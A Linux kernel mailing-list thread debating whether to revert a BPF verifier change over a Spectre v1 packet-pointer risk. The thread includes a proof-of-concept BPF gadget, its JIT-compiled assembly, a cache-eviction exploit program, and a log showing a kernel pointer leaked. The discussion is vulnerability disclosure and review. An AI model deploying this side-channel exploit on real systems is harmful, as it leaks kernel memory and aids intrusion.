This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduct constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and every date below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if a static upper bound, below of which every access is valid, can be given.
When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size and therefore 0 is the only statically known upper bound below of which every date is always accessible (i.e., none).
To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the same way in that comparing a pointer to a known scalar can be used for pointer leaks. That is because the "secret" components of the addresses cancel each other out if the pointers are into the same region.
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
r2 = *(u32 *)(r1 + 76) // data r3 = *(u32 *)(r1 + 80) // data_end r4 = r2 r4 += 1 if r4 > r3 goto exit r5 = *(u8 *)(r2 + 0) // speculatively read secret r5 &= 1 // choose bit to leak // ... side channel to leak secret bit exit: // ...
This is jited to the following amd64 code which still contains the gadget:
0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64 13: push %rbx 14: mov 0xc8(%rdi),%rsi // data 1b: mov 0x50(%rdi),%rdx // data_end 1f: mov %rsi,%rcx 22: add $0x1,%rcx 26: cmp %rdx,%rcx 29: ja 0x000000000000003f // branch to mispredict 2b: movzbq 0x0(%rsi),%r8 // speculative load of secret 30: and $0x1,%r8 // choose bit to leak 34: xor %ebx,%ebx 36: cmp %rbx,%r8 39: je 0x000000000000003f // branch based on secret 3b: imul $0x61,%r8,%r8 // leak using port contention side channel 3f: xor %eax,%eax 41: pop %rbx 42: leaveq 43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
As Daniel already pointed out to me, data_end is even attacker controlled as one could send many packets of sufficient length to train the branch prediction into assuming data_end >= data will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
To make it clear that the problem is not the pointer comparison but the missing masking instruction, it can be useful to transform the code above into the following equivalent pseudocode:
r2 = data r3 = data_end r6 = ... // index to access, constant does not help r7 = data_end - data // only known at runtime, could be [0,PKT_MAX) if !(r6 < r7) goto exit // no masking of index in r6 happens r2 += r6 // addr. to access r5 = *(u8 *)(r2 + 0) // speculatively read secret // ... leak secret as above
One idea to resolve this while still allowing for unprivileged packet access would be to always allocate a power of 2 for the packet data and then also pass the respective index mask in the skb structure. The verifier would then have to check that this index mask is always applied to the offset before a packet pointer is dereferenced. This patch does not implement this extension, but only reverts [3].
[1] 979d63d50c0c0f7bc537bf821e056cc9fe5abd38 ("bpf: prevent out of bounds speculation on pointer arithmetic") [2] b2157399cc9898260d6031c5bfe45fe137c1fbe7 ("bpf: prevent out-of-bounds speculation") [3] d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2 ("bpf: Fix issue in verifying allow_ptr_leaks")
Reported-by: Daniel Borkmann daniel@iogearbox.net Signed-off-by: Luis Gerhorst gerhorst@amazon.de Signed-off-by: Luis Gerhorst gerhorst@cs.fau.de Acked-by: Hagar Gamal Halim Hemdan hagarhem@amazon.de Cc: Puranjay Mohan puranjay12@gmail.com --- kernel/bpf/verifier.c | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-)
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c index bb78212fa5b2..b415a81149ed 100644 --- a/kernel/bpf/verifier.c +++ b/kernel/bpf/verifier.c @@ -14050,12 +14050,6 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env, return -EINVAL; }
- /* check src2 operand */ - err = check_reg_arg(env, insn->dst_reg, SRC_OP); - if (err) - return err; - - dst_reg = ®s[insn->dst_reg]; if (BPF_SRC(insn->code) == BPF_X) { if (insn->imm != 0) { verbose(env, "BPF_JMP/JMP32 uses reserved fields\n"); @@ -14067,13 +14061,12 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env, if (err) return err;
- src_reg = ®s[insn->src_reg]; - if (!(reg_is_pkt_pointer_any(dst_reg) && reg_is_pkt_pointer_any(src_reg)) && - is_pointer_value(env, insn->src_reg)) { + if (is_pointer_value(env, insn->src_reg)) { verbose(env, "R%d pointer comparison prohibited\n", insn->src_reg); return -EACCES; } + src_reg = ®s[insn->src_reg]; } else { if (insn->src_reg != BPF_REG_0) { verbose(env, "BPF_JMP/JMP32 uses reserved fields\n"); @@ -14081,6 +14074,12 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env, } }
+ /* check src2 operand */ + err = check_reg_arg(env, insn->dst_reg, SRC_OP); + if (err) + return err; + + dst_reg = ®s[insn->dst_reg]; is_jmp32 = BPF_CLASS(insn->code) == BPF_JMP32;
if (BPF_SRC(insn->code) == BPF_K) {
On Wed, Sep 13, 2023 at 5:30 AM Luis Gerhorst gerhorst@amazon.de wrote:
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduct constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and every date below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if a static upper bound, below of which every access is valid, can be given.
When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size and therefore 0 is the only statically known upper bound below of which every date is always accessible (i.e., none).
To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the same way in that comparing a pointer to a known scalar can be used for pointer leaks. That is because the "secret" components of the addresses cancel each other out if the pointers are into the same region.
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
r2 = *(u32 *)(r1 + 76) // data r3 = *(u32 *)(r1 + 80) // data_end r4 = r2 r4 += 1 if r4 > r3 goto exit r5 = *(u8 *)(r2 + 0) // speculatively read secret r5 &= 1 // choose bit to leak // ... side channel to leak secret bit exit: // ...
This is jited to the following amd64 code which still contains the gadget:
0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64 13: push %rbx 14: mov 0xc8(%rdi),%rsi // data 1b: mov 0x50(%rdi),%rdx // data_end 1f: mov %rsi,%rcx 22: add $0x1,%rcx 26: cmp %rdx,%rcx 29: ja 0x000000000000003f // branch to mispredict 2b: movzbq 0x0(%rsi),%r8 // speculative load of secret 30: and $0x1,%r8 // choose bit to leak 34: xor %ebx,%ebx 36: cmp %rbx,%r8 39: je 0x000000000000003f // branch based on secret 3b: imul $0x61,%r8,%r8 // leak using port contention side channel 3f: xor %eax,%eax 41: pop %rbx 42: leaveq 43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
As Daniel already pointed out to me, data_end is even attacker controlled as one could send many packets of sufficient length to train the branch prediction into assuming data_end >= data will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
The above analysis is correct, but unlike traditional spec_v1 the attacker doesn't control data/data_end. The attack can send many large packets to train that data + X < data_end and then send a small packet where CPU will mispredict that branch and data + X will speculatively read past data_end, so the attacker can extract a bit past data_end, but data/data_end themselves cannot be controlled. So whether this bit 0 or 1 has no bearing. The attack cannot be repeated for the same location. The attacker can read one bit 8 times in a row and all of them will be from different locations in the memory. Same as reading 8 random bits from 8 random locations. Hence I don't think this revert is necessary. I don't believe you can craft an actual exploit.
Your patch 3 says: /* Speculative access to be prevented. */ + char secret = *((char *) iph); + + /* Leak the first bit of the secret value that lies behind data_end to a + * SMP silbling thread that also executes imul instructions. If the bit + * is 1, the silbling will experience a slowdown. */ + long long x = secret; + if (secret & 1) { + x *= 97; + }
the comment is correct, but speculative access alone is not enough to leak data.
On 9/14/23 6:20 PM, Alexei Starovoitov wrote:
On Wed, Sep 13, 2023 at 5:30 AM Luis Gerhorst gerhorst@amazon.de wrote:
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduct constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and every date below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if a static upper bound, below of which every access is valid, can be given.
When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size and therefore 0 is the only statically known upper bound below of which every date is always accessible (i.e., none).
To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the same way in that comparing a pointer to a known scalar can be used for pointer leaks. That is because the "secret" components of the addresses cancel each other out if the pointers are into the same region.
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
r2 = *(u32 *)(r1 + 76) // data r3 = *(u32 *)(r1 + 80) // data_end r4 = r2 r4 += 1 if r4 > r3 goto exit r5 = *(u8 *)(r2 + 0) // speculatively read secret r5 &= 1 // choose bit to leak // ... side channel to leak secret bit exit: // ...
This is jited to the following amd64 code which still contains the gadget:
0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64
13: push %rbx 14: mov 0xc8(%rdi),%rsi // data 1b: mov 0x50(%rdi),%rdx // data_end 1f: mov %rsi,%rcx 22: add $0x1,%rcx 26: cmp %rdx,%rcx 29: ja 0x000000000000003f // branch to mispredict 2b: movzbq 0x0(%rsi),%r8 // speculative load of secret 30: and $0x1,%r8 // choose bit to leak 34: xor %ebx,%ebx 36: cmp %rbx,%r8 39: je 0x000000000000003f // branch based on secret 3b: imul $0x61,%r8,%r8 // leak using port contention side channel 3f: xor %eax,%eax 41: pop %rbx 42: leaveq 43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
As Daniel already pointed out to me, data_end is even attacker controlled as one could send many packets of sufficient length to train the branch prediction into assuming data_end >= data will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
The above analysis is correct, but unlike traditional spec_v1 the attacker doesn't control data/data_end. The attack can send many large packets to train that data + X < data_end and then send a small packet where CPU will mispredict that branch and data + X will speculatively read past data_end, so the attacker can extract a bit past data_end, but data/data_end themselves cannot be controlled. So whether this bit 0 or 1 has no bearing. The attack cannot be repeated for the same location. The attacker can read one bit 8 times in a row and all of them will be from different locations in the memory. Same as reading 8 random bits from 8 random locations. Hence I don't think this revert is necessary. I don't believe you can craft an actual exploit.
Your patch 3 says: /* Speculative access to be prevented. */
char secret = *((char *) iph);
/* Leak the first bit of the secret value that lies behind data_end to a
* SMP silbling thread that also executes imul instructions. If the bit
* is 1, the silbling will experience a slowdown. */
long long x = secret;
if (secret & 1) {
x *= 97;
}
the comment is correct, but speculative access alone is not enough to leak data.
What you write makes sense, it will probably be hard to craft an exploit. Where it's a bit more of an unknown to me is whether struct skb_shared_info could have e.g. destructor_arg rather static (at last the upper addr bits) so that you would leak out kernel addresses.
On Thu, Sep 14, 2023 at 10:24 AM Daniel Borkmann daniel@iogearbox.net wrote:
On 9/14/23 6:20 PM, Alexei Starovoitov wrote:
On Wed, Sep 13, 2023 at 5:30 AM Luis Gerhorst gerhorst@amazon.de wrote:
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduct constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and every date below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if a static upper bound, below of which every access is valid, can be given.
When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size and therefore 0 is the only statically known upper bound below of which every date is always accessible (i.e., none).
To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the same way in that comparing a pointer to a known scalar can be used for pointer leaks. That is because the "secret" components of the addresses cancel each other out if the pointers are into the same region.
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
r2 = *(u32 *)(r1 + 76) // data r3 = *(u32 *)(r1 + 80) // data_end r4 = r2 r4 += 1 if r4 > r3 goto exit r5 = *(u8 *)(r2 + 0) // speculatively read secret r5 &= 1 // choose bit to leak // ... side channel to leak secret bit exit: // ...
This is jited to the following amd64 code which still contains the gadget:
0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64
13: push %rbx 14: mov 0xc8(%rdi),%rsi // data 1b: mov 0x50(%rdi),%rdx // data_end 1f: mov %rsi,%rcx 22: add $0x1,%rcx 26: cmp %rdx,%rcx 29: ja 0x000000000000003f // branch to mispredict 2b: movzbq 0x0(%rsi),%r8 // speculative load of secret 30: and $0x1,%r8 // choose bit to leak 34: xor %ebx,%ebx 36: cmp %rbx,%r8 39: je 0x000000000000003f // branch based on secret 3b: imul $0x61,%r8,%r8 // leak using port contention side channel 3f: xor %eax,%eax 41: pop %rbx 42: leaveq 43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
As Daniel already pointed out to me, data_end is even attacker controlled as one could send many packets of sufficient length to train the branch prediction into assuming data_end >= data will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
The above analysis is correct, but unlike traditional spec_v1 the attacker doesn't control data/data_end. The attack can send many large packets to train that data + X < data_end and then send a small packet where CPU will mispredict that branch and data + X will speculatively read past data_end, so the attacker can extract a bit past data_end, but data/data_end themselves cannot be controlled. So whether this bit 0 or 1 has no bearing. The attack cannot be repeated for the same location. The attacker can read one bit 8 times in a row and all of them will be from different locations in the memory. Same as reading 8 random bits from 8 random locations. Hence I don't think this revert is necessary. I don't believe you can craft an actual exploit.
Your patch 3 says: /* Speculative access to be prevented. */
char secret = *((char *) iph);
/* Leak the first bit of the secret value that lies behind data_end to a
* SMP silbling thread that also executes imul instructions. If the bit
* is 1, the silbling will experience a slowdown. */
long long x = secret;
if (secret & 1) {
x *= 97;
}
the comment is correct, but speculative access alone is not enough to leak data.
What you write makes sense, it will probably be hard to craft an exploit. Where it's a bit more of an unknown to me is whether struct skb_shared_info could have e.g. destructor_arg rather static (at last the upper addr bits) so that you would leak out kernel addresses.
You mean since skb_shared_info is placed after skb->end and in zero copy case destructor_arg may be initialized with the same kernel pointer for multiple skb-s ? The attacker cannot construct the address from data_end. The verifier explicitly prohibits any ALU with PTR_TO_PACKET_END. But the attacker can do skb->data + X. The idea is that they can train the branch to mispredict with a large packet and then send a small one so that shared_info after skb->end has the same uarg pointer in all packets? So every skb->data+X is a different location, but all of them point to data that has uarg==destructor_arg ?
That would be feasible in theory, but in order to speculate the loads the branch mispredict has to be reliable. The spec v1 attack requires one of two loads feeding into compare operation has to be slow. In this case both data and data_end loads are going to be fast. The attacker cannot evict skb->data or skb->data_end from cache. Remember that we rearranged 'max_entries' field in struct bpf_map specifically to be in the different cache line vs fields controlled by user space. It was the necessary part of spec v1 attack.
So I still believe this revert is unnecessary and this speculative execution is not exploitable.
On Thu, 14 Sep 2023 12:47:16 -0700, Alexei Starovoitov wrote:
You mean since skb_shared_info is placed after skb->end and in zero copy case destructor_arg may be initialized with the same kernel pointer for multiple skb-s ? The attacker cannot construct the address from data_end. The verifier explicitly prohibits any ALU with PTR_TO_PACKET_END. But the attacker can do skb->data + X. The idea is that they can train the branch to mispredict with a large packet and then send a small one so that shared_info after skb->end has the same uarg pointer in all packets? So every skb->data+X is a different location, but all of them point to data that has uarg==destructor_arg ?
That would be feasible in theory, but in order to speculate the loads the branch mispredict has to be reliable. The spec v1 attack requires one of two loads feeding into compare operation has to be slow. In this case both data and data_end loads are going to be fast. The attacker cannot evict skb->data or skb->data_end from cache.
It is true that this is not easily possible using the method most exploits use, at least to my knowledge (i.e., accessing the same address from another core). However, it is still possible to evict the cacheline with skb->data/data_end from the cache in between the loads by iterating over a large map using bpf_loop(). Then the load of skb->data_end would be slow while skb->data is readily available in a callee-saved register.
For a CPU with 64KiB of per-core L1 cache all 64-byte cachelines can be evicted by iterating over a 64KiB array using 64-byte increments, that's only 1k iterations. Meanwhile, skb->data can be safe in r15 as this is not used by bpf_loop() and bpf_map_lookup_elem(). Even evicting the L2 cache might be possible as bpf_loop() currently has a iteration limit of 8 million. To extend that, userspace could work on evicting the L3 cache from other cores and make the speculation window even larger. This would of course slow the whole reading process down, but in return you can also leak more data by indexing into the leak-array using a full byte.
For reference, here's the full program and assembly it is jited to:
static long callback_fn(__u32 index, void *ctx) { __u32 key = index * 8; __u64 *value = bpf_map_lookup_elem(&evictmap, &key); if (value) { *value = 2 * *value; return 0; } return 1; }
SEC("tcx/ingress") __naked void pkt_ptr(void) { // +76: data // +80: data_end asm volatile (" \ r6 = 0; \ r7 = r1; \ prepare_data_%=: \ r8 = *(u32 *)(r1 + 76); \ r9 = r8; \ r9 += 34; \ evict_loop_%=: \ w1 = 1024; \ r2 = %[callback_fn] ll; \ r3 = 0; \ *(u64 *)(r10 - 8) = r3; \ r3 = r10; \ r3 += -8; \ r4 = 0; \ call %[bpf_loop]; \ gadget_%=: \ r2 = *(u32 *)(r7 + 80); \ if r2 <= r9 goto exit_%=; \ r5 = *(u8 *)(r7 + 14); \ *(u64*)(r10 - 8) = r5; \ r2 = r10; \ r2 += -8; \ r1 = %[leakmap] ll; \ call %[bpf_map_lookup_elem]; \ if r0 == 0 goto exit_%=; \ r6 = *(u64 *)(r0 + 0); \ exit_%=: r0 = r6; \ exit; \ " : : __imm_addr(leakmap), __imm_addr(callback_fn), __imm(bpf_loop), __imm(bpf_map_lookup_elem) : __clobber_all); }
bpf_prog_64fe264baec539aa_pkt_ptr: ; asm volatile (" \ 0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64 13: sub $0x20,%rsp 1a: push %rbx 1b: push %r13 1d: push %r14 1f: push %r15 21: xor %ebx,%ebx 23: mov %rdi,%r13 26: mov 0xc8(%rdi),%r14 2d: mov %r14,%r15 30: add $0x22,%r15 // data prepared 34: mov $0x2000,%edi 39: movabs $0xffffffffc01d09b0,%rsi 43: xor %edx,%edx 45: mov %rdx,-0x8(%rbp) 49: lfence 4c: mov %rbp,%rdx 4f: add $0xfffffffffffffff8,%rdx 53: xor %ecx,%ecx 55: cmp $0x800000,%rdi 5c: jbe 0x0000000000000065 5e: mov $0xfffffff9,%eax 63: jmp 0x00000000000000a2 65: mov %rbx,-0x20(%rbp) 69: mov %r13,-0x18(%rbp) 6d: mov %r14,-0x10(%rbp) 71: mov %rdi,%rbx 74: xor %r13d,%r13d 77: mov %rdx,%r14 7a: cmp %rbx,%r13 7d: jae 0x0000000000000093 7f: mov %r13,%rdi 82: mov %r14,%rsi 85: callq 0x0000000000000148 8a: add $0x1,%r13 8e: test %rax,%rax 91: je 0x000000000000007a 93: mov %r13,%rax 96: mov -0x20(%rbp),%rbx 9a: mov -0x18(%rbp),%r13 9e: mov -0x10(%rbp),%r14 a2: mov 0x50(%r13),%rsi // load data_end a6: cmp %r15,%rsi // use of data_end and data a9: jbe 0x00000000000000f7 // to mispredict ab: movzwq 0x7c(%r13),%r8 // use of data b0: shr $0x10,%r8d b4: and $0xff,%r8d bb: mov %r8,-0x8(%rbp) bf: mov %rbp,%rsi c2: add $0xfffffffffffffff8,%rsi c6: movabs $0xffffb85680acd000,%rdi d0: add $0x210,%rdi d7: mov 0x0(%rsi),%eax da: cmp $0x20000,%rax e1: jae 0x00000000000000ec e3: shl $0x3,%rax e7: add %rdi,%rax ea: jmp 0x00000000000000ee ec: xor %eax,%eax ee: test %rax,%rax f1: je 0x00000000000000f7 f3: mov 0x0(%rax),%rbx f7: mov %rbx,%rax fa: pop %r15 fc: pop %r14 fe: pop %r13 100: pop %rbx 101: leaveq 102: retq
long callback_fn(__u32 index, void * ctx): bpf_prog_8e1ec5bf965fdd4a_callback_fn: ; __u32 key = index * 8; 0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64 13: sub $0x8,%rsp 1a: shl $0x3,%edi ; __u32 key = index * 8; 1d: mov %edi,-0x4(%rbp) 20: lfence 23: mov %rbp,%rsi ; 26: add $0xfffffffffffffffc,%rsi ; __u64 *value = bpf_map_lookup_elem(&evictmap, &key); 2a: movabs $0xffffb85680a01000,%rdi 34: add $0x210,%rdi 3b: mov 0x0(%rsi),%eax 3e: cmp $0x1000,%rax 45: jae 0x0000000000000050 47: shl $0x3,%rax 4b: add %rdi,%rax 4e: jmp 0x0000000000000052 50: xor %eax,%eax 52: mov $0x1,%edi ; if (value) { 57: test %rax,%rax 5a: je 0x0000000000000069 ; *value = 2 * *value; 5c: mov 0x0(%rax),%rdi ; *value = 2 * *value; 60: shl %rdi ; *value = 2 * *value; 63: mov %rdi,0x0(%rax) 67: xor %edi,%edi ; } 69: mov %rdi,%rax 6c: leaveq 6d: retq
Remember that we rearranged 'max_entries' field in struct bpf_map specifically to be in the different cache line vs fields controlled by user space. It was the necessary part of spec v1 attack.
On Mon, Sep 18, 2023 at 4:26 AM Luis Gerhorst gerhorst@amazon.de wrote:
It is true that this is not easily possible using the method most exploits use, at least to my knowledge (i.e., accessing the same address from another core). However, it is still possible to evict the cacheline with skb->data/data_end from the cache in between the loads by iterating over a large map using bpf_loop(). Then the load of skb->data_end would be slow while skb->data is readily available in a callee-saved register.
...
call %[bpf_loop]; \ gadget_%=: \ r2 = *(u32 *)(r7 + 80); \ if r2 <= r9 goto exit_%=; \
r9 is supposed to be available in the callee-saved register? :) I think you're missing that it is _callee_ saved. If that bpf_loop indeed managed to flush L1 cache the refill of r9 in the epilogue would be a cache miss. And r7 will be a cache miss as well. So there is no chance cpu will execute 'if r2 <= r9' speculatively.
I have to agree that the above approach sounds plausible in theory and I've never seen anyone propose to mispredict a branch this way. Which also means that no known speculation attack was crafted. I suspect that's a strong sign that the above approach is indeed a theory and it doesn't work in practice. Likely because the whole cache is flushed the subsequent misses will spoil all speculation. For spec v1 to work you need only one slow load in one side of that branch. The other load and the speculative code after should not miss. When it does the spec code won't be able to leave the breadcrumbs of the leaked bit in the cache. 'Leak full byte' is also 'wishful thinking' imo. I haven't seen any attack that leaks byte at-a-time.
So I will insist on seeing a full working exploit before doing anything else here. It's good to discuss this cpu speculation concerns, but we have to stay practical. Even removing bpf from the picture there is so much code in the network core that checks packet boundaries. One can find plenty of cases of 'read past skb->end' under speculation and I'm arguing none of them are exploitable.
On Tue, 19 Sep 2023 01:57:21 -0700 Alexei Starovoitov wrote:
r9 is supposed to be available in the callee-saved register? :) I think you're missing that it is _callee_ saved.
I'm sorry I guess this was not clear enough, the idea was that this register is not used by the callee, and therefore it also does not have to be restored. Anyway, this does not appear to be important (I guess because the return has to pull the stack into the cache anyway), see below.
If that bpf_loop indeed managed to flush L1 cache the refill of r9 in the epilogue would be a cache miss. And r7 will be a cache miss as well. So there is no chance cpu will execute 'if r2 <= r9' speculatively.
I have to agree that the above approach sounds plausible in theory and I've never seen anyone propose to mispredict a branch this way. Which also means that no known speculation attack was crafted. I suspect that's a strong sign that the above approach is indeed a theory and it doesn't work in practice. Likely because the whole cache is flushed the subsequent misses will spoil all speculation. For spec v1 to work you need only one slow load in one side of that branch. The other load and the speculative code after should not miss. When it does the spec code won't be able to leave the breadcrumbs of the leaked bit in the cache. 'Leak full byte' is also 'wishful thinking' imo. I haven't seen any attack that leaks byte at-a-time.
So I will insist on seeing a full working exploit before doing anything else here. It's good to discuss this cpu speculation concerns, but we have to stay practical.
I tried this and below you find a patch that leaks the otherwise inaccessible skb_shinfo(skb)->frags[0].bv_page which lies 196 bytes behind skb->data_end from userspace at 100B/h.
However, you are right in that there does not appear to be anything extremely useful behind skb->data_end, destructor_arg is NULL in my setup but I have also not found any code putting a static pointer there. Therefore if it stays like this and we are sure the allocator introduces sufficient randomness to make OOB reads useless, the original patches can stay. If you decide to do this I will be happy to craft a patch that documents that the respective structs should be considered 'public' under Spectre v1 to make sure nobody puts anything sensitive there.
The exploit (if you consider leaking a struct page * and exploit) does not leak more than one bit per mispredict (I did not try that) but flushing data_end from the cache using bpf_loop() indeed appears to have the desired effect (if you remove it, it doesn't work).
One can find plenty of cases of 'read past skb->end' under speculation and I'm arguing none of them are exploitable.
I have not looked into those but I guess flushing the cache in between the loads does not happen there.
Here's a shortened session log for using the patch below:
$ lsb_release -a Description: Debian GNU/Linux 11 (bullseye) $ uname -a Linux $HOST 5.10.0-25-cloud-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux $ lscpu Socket(s): 2 Model name: Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz Virtualization: VT-x Vulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization $ stress-ng --cache $(nproc) --cache-level 3 & $ ./tools/testing/selftests/bpf/vmtest.sh -- time ./test_progs -t tc_bpf <...> [ 0.297557] smpboot: CPU0: Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz (family: 0x6, model: 0x4f, stepping: 0x1) <...> userspace guess for *(u64 *)(data+366 = data_end+196) = 0xffffdd2f04159400
You can already see that looks like a pointer. To also let the kernel print the actual value remove the '#if 0' in cls_bpf_classify(). With that you can check whether the middle bits are correct:
$ ./tools/testing/selftests/bpf/vmtest.sh -- time ./test_progs -t tc_bpf <...> [ 2.399485] kernel skb_shinfo(skb)->frags[0].bv_page [ 2.399485] *(ffff8a7541154670 ?= data+366 = ffff8a7541154670) = ffffe387c4155e00 <...> userspace guess for *(u64 *)(data+366 = data_end+196) = 0xffffe387c4155e00
Misc: Please make sure you always reply-to/cc gerhorst@cs.fau.de as gerhorst@amazon.de will become unmonitored shortly.
Signed-off-by: Luis Gerhorst gerhorst@amazon.de Signed-off-by: Luis Gerhorst gerhorst@cs.fau.de --- net/sched/cls_bpf.c | 22 ++ .../testing/selftests/bpf/prog_tests/tc_bpf.c | 334 +++++++++++++++++- .../testing/selftests/bpf/progs/test_tc_bpf.c | 78 +++- .../selftests/bpf/progs/test_tc_bpf_pkt_ptr.h | 172 +++++++++ .../bpf/progs/test_tc_bpf_pkt_ptr_byte.h | 31 ++ 5 files changed, 625 insertions(+), 12 deletions(-) mode change 100644 => 100755 tools/testing/selftests/bpf/prog_tests/tc_bpf.c mode change 100644 => 100755 tools/testing/selftests/bpf/progs/test_tc_bpf.c create mode 100644 tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h create mode 100644 tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h
diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c index 382c7a71f81f..ef36ebca3b11 100644 --- a/net/sched/cls_bpf.c +++ b/net/sched/cls_bpf.c @@ -99,6 +99,28 @@ TC_INDIRECT_SCOPE int cls_bpf_classify(struct sk_buff *skb, __skb_push(skb, skb->mac_len); bpf_compute_data_pointers(skb); filter_res = bpf_prog_run(prog->filter, skb); + +#if 0 + // Print after program to not mess with the cache. + static atomic_t init = ATOMIC_INIT(0); + if (unlikely(skb_headlen(skb) == 170 && atomic_inc_return(&init) == 1)) { + barrier_nospec(); + struct bpf_skb_data_end *cb = (struct bpf_skb_data_end *)skb->cb; + pr_err_ratelimited( + "skb = %px, skb_headlen(skb) = %d\n" + "data *(%px) = %px\n" + "data_end *(%px) = %px\n" + "kernel skb_shinfo(skb)->frags[0].bv_page\n\t*(%px ?= data+366 = %px) = %px\n", + skb, skb_headlen(skb), + &(skb->data), skb->data, + &(cb->data_end), cb->data_end, + &skb_shinfo(skb)->frags[0].bv_page, + ((char *) skb->data) + 366, + skb_shinfo(skb)->frags[0].bv_page + ); + } +#endif + __skb_pull(skb, skb->mac_len); } else { bpf_compute_data_pointers(skb); diff --git a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c old mode 100644 new mode 100755 index 48b55539331e..ec82e95895b5 --- a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c +++ b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c @@ -2,6 +2,8 @@
#include <test_progs.h> #include <linux/pkt_cls.h> +#include <arpa/inet.h> +#include <sys/socket.h>
#include "cap_helpers.h" #include "test_tc_bpf.skel.h" @@ -395,6 +397,251 @@ void tc_bpf_root(void) test_tc_bpf__destroy(skel); }
